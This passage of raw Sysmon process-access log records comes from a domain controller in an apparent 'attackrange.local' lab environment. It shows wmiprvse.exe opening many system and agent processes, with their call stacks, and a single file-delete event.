Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204183Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A3-603E-A900-00000000AD01}4912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204182Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204181Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5B00-00000000AD01}3492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204180Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204179Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3400-00000000AD01}2960C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204178Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3300-00000000AD01}2668C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204177Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204176Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204175Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2F00-00000000AD01}2420C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204174Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204173Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2D00-00000000AD01}2308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204172Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204171Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2B00-00000000AD01}2540C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204170Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204169Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2700-00000000AD01}3004C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204168Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8439-603E-2500-00000000AD01}2856C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204167Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8430-603E-1800-00000000AD01}1928C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204166Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEA817925828E44C2B2005BBDF4D3447,SHA256=7365DFDD1697B5CD13D85064AF6169720FA426BCDE804FC65BF0641D8264BAB1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204165Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1700-00000000AD01}1452C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204164Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.